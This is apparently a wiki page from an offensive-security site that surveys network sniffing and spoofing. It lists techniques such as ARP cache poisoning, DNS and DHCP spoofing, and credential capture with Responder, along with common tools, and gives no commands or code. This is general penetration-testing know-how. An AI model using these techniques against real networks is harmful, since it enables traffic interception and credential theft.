Sniffing & Spoofing

From HackOps
Jump to navigation Jump to search

Sniffing[edit | edit source]

Sniffing inspects network traffic in real-time, extracting headers, payloads, and session metadata. It uncovers credentials, tokens, and protocol weaknesses, and establishes situational awareness before or during exploitation.

Common Techniques[edit | edit source]

Capturing raw packets with promiscuous or monitor mode interfaces Filtering traffic by IP, port, or protocol to isolate valuable data Reassembling TCP streams to read clear-text credentials Following unencrypted protocols (HTTP, Telnet, SMTP, FTP) for rapid intel Leveraging port mirroring, SPAN, or hub-based topologies for full-duplex capture Decrypting TLS when private keys or session secrets are available Extracting files, images, and VoIP calls directly from packet flows

Tools[edit | edit source]

  • Wireshark (GUI packet analyzer with deep protocol dissection)
  • tcpdump (lightweight CLI sniffer for scripted captures)
  • tshark (Wireshark’s CLI engine for remote or headless use)
  • Bettercap (modular MITM framework with live packet capture)
  • Zeek (formerly Bro; network security monitor that logs and scripts traffic events)
  • Scapy (Python library for custom packet crafting and sniffing)
  • pcapplus-based scripts (custom automation around libpcap)

Spoofing[edit | edit source]

Spoofing forges network identity to redirect traffic, hijack sessions, or bypass access controls. By masquerading as trusted hosts or infrastructure, an operator gains man-in-the-middle positions, network access, and lateral movement capability.

Common Techniques[edit | edit source]

  • MAC spoofing to bypass wireless MAC filtering or port-based NAC
  • ARP cache poisoning to position a MITM node inside switched LANs
  • DNS spoofing to deliver malicious IPs for trusted domains
  • IP spoofing in stateless protocols (e.g., UDP) to mask source or trigger reflection
  • DHCP spoofing for rogue gateway injection and traffic capture
  • Email header spoofing to improve phishing credibility
  • LLDP/CDP spoofing to influence network device topology views

Tools[edit | edit source]

  • arpspoof (classic ARP poisoning utility in dsniff suite)
  • Bettercap (real-time ARP, DNS, and DHCP spoofing with interactive console)
  • Ettercap (MITM framework supporting ARP, DNS, and SSL stripping)
  • macchanger (quick MAC address changer for Linux)
  • Responder (rogue SMB/HTTP/MDNS/NBT-NS responder that coerces credential hand-offs)
  • Scapy (crafts arbitrary Ethernet/IP packets for advanced spoofing scenarios)
  • hping3 (raw-packet generator for IP-level spoofing, testing, and DoS research)
  • ip link set / `ifconfig (manual MAC spoofing by taking interface down, changing MAC, and bringing it up)
Retrieved from "https://hackops.wiki/index.php?title=Sniffing_%26_Spoofing&oldid=81"